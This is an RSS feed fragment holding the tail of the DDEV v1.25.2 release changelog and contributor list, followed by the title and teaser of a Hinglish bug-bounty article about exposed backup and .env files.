<li>feat: add global omit_snapshot_on_delete setting, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162839194" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8263" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8263/hovercard" href="https://github.com/ddev/ddev/issues/8263">#8263</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162955759" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8264" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8264/hovercard" href="https://github.com/ddev/ddev/pull/8264">#8264</a>) [skiop ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marklabrecque-ab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marklabrecque-ab">@marklabrecque-ab</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162955759" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8264" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8264/hovercard" href="https://github.com/ddev/ddev/pull/8264">#8264</a></li>
<li>feat: support "1" for environment variables by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deviantintegral/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deviantintegral">@deviantintegral</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4113345653" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8246" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8246/hovercard" href="https://github.com/ddev/ddev/pull/8246">#8246</a></li>
<li>chore: add link to blog about buildx requirement, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091341649" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8234" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8234/hovercard" href="https://github.com/ddev/ddev/pull/8234">#8234</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4239901346" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8310" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8310/hovercard" href="https://github.com/ddev/ddev/pull/8310">#8310</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4239901346" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8310" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8310/hovercard" href="https://github.com/ddev/ddev/pull/8310">#8310</a></li>
<li>build: bump actions/github-script from 8 to 9 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256518754" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8314" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8314/hovercard" href="https://github.com/ddev/ddev/pull/8314">#8314</a></li>
<li>fix(composer): remove <code>composer update</code> from create-project, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626977833" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7864" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7864/hovercard" href="https://github.com/ddev/ddev/pull/7864">#7864</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261740837" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8315" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8315/hovercard" href="https://github.com/ddev/ddev/pull/8315">#8315</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261740837" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8315" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8315/hovercard" href="https://github.com/ddev/ddev/pull/8315">#8315</a></li>
<li>fix(webserver): add timeout to <code>yarn config set</code> in start.sh (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4239818699" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8309" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8309/hovercard" href="https://github.com/ddev/ddev/pull/8309">#8309</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4239818699" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8309" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8309/hovercard" href="https://github.com/ddev/ddev/pull/8309">#8309</a></li>
<li>refactor(debug): simplify RunSimpleContainer reporting, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189274286" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8271" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8271/hovercard" href="https://github.com/ddev/ddev/pull/8271">#8271</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240266041" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8311" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8311/hovercard" href="https://github.com/ddev/ddev/pull/8311">#8311</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240266041" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8311" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8311/hovercard" href="https://github.com/ddev/ddev/pull/8311">#8311</a></li>
<li>feat: add <code>ddev utility port-diagnose</code> command to identify port conflicts, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3877499183" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8085" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8085/hovercard" href="https://github.com/ddev/ddev/issues/8085">#8085</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160159293" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8260" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8260/hovercard" href="https://github.com/ddev/ddev/pull/8260">#8260</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160159293" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8260" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8260/hovercard" href="https://github.com/ddev/ddev/pull/8260">#8260</a></li>
<li>feat: add wp-bedrock project type, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3984048324" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8179" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8179/hovercard" href="https://github.com/ddev/ddev/issues/8179">#8179</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonesrussell/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonesrussell">@jonesrussell</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056275240" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8219" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8219/hovercard" href="https://github.com/ddev/ddev/pull/8219">#8219</a></li>
<li>feat(docker): set ddev labels for images, containers, networks, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3160219702" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7389" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7389/hovercard" href="https://github.com/ddev/ddev/issues/7389">#7389</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241447664" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8312" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8312/hovercard" href="https://github.com/ddev/ddev/pull/8312">#8312</a></li>
<li>refactor(debug): improve reporting for RunSimpleContainer timeout, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240266041" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8311" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8311/hovercard" href="https://github.com/ddev/ddev/pull/8311">#8311</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271199945" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8317" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8317/hovercard" href="https://github.com/ddev/ddev/pull/8317">#8317</a></li>
<li>perf(router): reduce fresh-router healthcheck wait, refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3892114614" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8096" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8096/hovercard" href="https://github.com/ddev/ddev/issues/8096">#8096</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270596917" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8316" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8316/hovercard" href="https://github.com/ddev/ddev/pull/8316">#8316</a></li>
<li>test: update moodle quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275241899" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8319" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8319/hovercard" href="https://github.com/ddev/ddev/pull/8319">#8319</a></li>
<li>fix(test): use local apt repo with fake packages to avoid flakiness in TestExtraPackages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276235544" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8323" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8323/hovercard" href="https://github.com/ddev/ddev/pull/8323">#8323</a></li>
<li>feat(asterios): Add Asterios project type (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247399027" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8313" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8313/hovercard" href="https://github.com/ddev/ddev/pull/8313">#8313</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asteriosphp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asteriosphp">@asteriosphp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247399027" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8313" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8313/hovercard" href="https://github.com/ddev/ddev/pull/8313">#8313</a></li>
<li>feat: add ddev utility tls-diagnose command, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065227512" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8224" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8224/hovercard" href="https://github.com/ddev/ddev/issues/8224">#8224</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160113889" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8259" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8259/hovercard" href="https://github.com/ddev/ddev/pull/8259">#8259</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160113889" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8259" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8259/hovercard" href="https://github.com/ddev/ddev/pull/8259">#8259</a></li>
<li>fix(installer): fix malformed WSLENV on Windows install/uninstall, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276511809" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8324" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8324/hovercard" href="https://github.com/ddev/ddev/issues/8324">#8324</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276691754" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8325" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8325/hovercard" href="https://github.com/ddev/ddev/pull/8325">#8325</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276691754" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8325" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8325/hovercard" href="https://github.com/ddev/ddev/pull/8325">#8325</a></li>
<li>fix(traefik): don't mark README.txt as stale (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4281073917" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8329" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8329/hovercard" href="https://github.com/ddev/ddev/pull/8329">#8329</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4281073917" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8329" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8329/hovercard" href="https://github.com/ddev/ddev/pull/8329">#8329</a></li>
<li>build(deps): bump go.mod and docker-compose to v5.1.3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274645754" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8318" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8318/hovercard" href="https://github.com/ddev/ddev/pull/8318">#8318</a></li>
<li>test(wsl): mkcert installation on Windows too hard for WSL by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285840319" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8333" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8333/hovercard" href="https://github.com/ddev/ddev/pull/8333">#8333</a></li>
<li>refactor: remove obsolete <code>ddev sequelpro</code> command (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283861180" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8331" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8331/hovercard" href="https://github.com/ddev/ddev/pull/8331">#8331</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4283861180" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8331" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8331/hovercard" href="https://github.com/ddev/ddev/pull/8331">#8331</a></li>
<li>feat: add joomla project type by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/renekreijveld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/renekreijveld">@renekreijveld</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072977423" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8226" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8226/hovercard" href="https://github.com/ddev/ddev/pull/8226">#8226</a></li>
<li>build(docker): bump images to v1.25.2 for release, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4275708083" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8320" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8320/hovercard" href="https://github.com/ddev/ddev/issues/8320">#8320</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284679832" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8332" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8332/hovercard" href="https://github.com/ddev/ddev/pull/8332">#8332</a></li>
<li>build(ci): remove -failfast, support MAKE_TARGET/TESTPKG/TESTFILE for targeted test runs, increase timeout to 6h by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297034281" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8336" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8336/hovercard" href="https://github.com/ddev/ddev/pull/8336">#8336</a></li>
<li>ci: improve Buildkite test result visibility for FAIL/PASS/SKIP (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297511222" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8338" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8338/hovercard" href="https://github.com/ddev/ddev/pull/8338">#8338</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297511222" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8338" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8338/hovercard" href="https://github.com/ddev/ddev/pull/8338">#8338</a></li>
<li>test(wsl): fix CAROOT propagation for buildkite-agent on WSL2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288810086" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8334" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8334/hovercard" href="https://github.com/ddev/ddev/pull/8334">#8334</a></li>
<li>chore(assets): add <code>.ddev/addon-metadata/README.txt</code> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4302134709" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8343" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8343/hovercard" href="https://github.com/ddev/ddev/pull/8343">#8343</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4302134709" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8343" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8343/hovercard" href="https://github.com/ddev/ddev/pull/8343">#8343</a></li>
<li>fix: flush Mutagen before container chmod and after settings file write, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298752588" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8340" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8340/hovercard" href="https://github.com/ddev/ddev/issues/8340">#8340</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299336976" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8341" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8341/hovercard" href="https://github.com/ddev/ddev/pull/8341">#8341</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299336976" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8341" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8341/hovercard" href="https://github.com/ddev/ddev/pull/8341">#8341</a></li>
<li>fix: warn instead of silently ignoring RemoveProjectInfo error, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298709045" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8339" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8339/hovercard" href="https://github.com/ddev/ddev/issues/8339">#8339</a> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299366211" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8342" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8342/hovercard" href="https://github.com/ddev/ddev/pull/8342">#8342</a>) [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299366211" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8342" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8342/hovercard" href="https://github.com/ddev/ddev/pull/8342">#8342</a></li>
<li>fix(installer): prevent CI timeout in WSL2 Docker CE installer test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297371579" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8337" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8337/hovercard" href="https://github.com/ddev/ddev/pull/8337">#8337</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samcrichard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samcrichard">@samcrichard</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4028488873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8205" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8205/hovercard" href="https://github.com/ddev/ddev/pull/8205">#8205</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hchonov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hchonov">@hchonov</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195029224" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8274" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8274/hovercard" href="https://github.com/ddev/ddev/pull/8274">#8274</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariano-dagostino/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariano-dagostino">@mariano-dagostino</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4023127186" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8202" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8202/hovercard" href="https://github.com/ddev/ddev/pull/8202">#8202</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daftspunk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daftspunk">@daftspunk</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206103369" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8285" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8285/hovercard" href="https://github.com/ddev/ddev/pull/8285">#8285</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marklabrecque-ab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marklabrecque-ab">@marklabrecque-ab</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162955759" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8264" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8264/hovercard" href="https://github.com/ddev/ddev/pull/8264">#8264</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asteriosphp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asteriosphp">@asteriosphp</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4247399027" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8313" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8313/hovercard" href="https://github.com/ddev/ddev/pull/8313">#8313</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/renekreijveld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/renekreijveld">@renekreijveld</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072977423" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8226" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8226/hovercard" href="https://github.com/ddev/ddev/pull/8226">#8226</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.25.1...v1.25.2"><tt>v1.25.1...v1.25.2</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Backup Files + .env Exposure Developers Ki Sabse Badi Galti: Config Files Se Credentials Nikalo!]]></title>
<description><![CDATA[Backup Files + .env Exposure Developers Ki Sabse Badi Galti: Config Files Se Credentials Nikalo! (Hinglish Mein)Series: Bug Bounty Zero se Hero 🦸 | Article #21By HackerMD | 17 min readAaj Kya Seekhenge?Backup files exposure kya hai basics se.env, .git, config files sabhi typesKahan dhundhen compl...]]></description>
<link>https://tsecurity.de/de/3473288/hacking/backup-files-env-exposure-developers-ki-sabse-badi-galti-config-files-se-credentials-nikalo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473288/hacking/backup-files-env-exposure-developers-ki-sabse-badi-galti-config-files-se-credentials-nikalo/</guid>
<pubDate>Wed, 29 Apr 2026 07:22:37 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
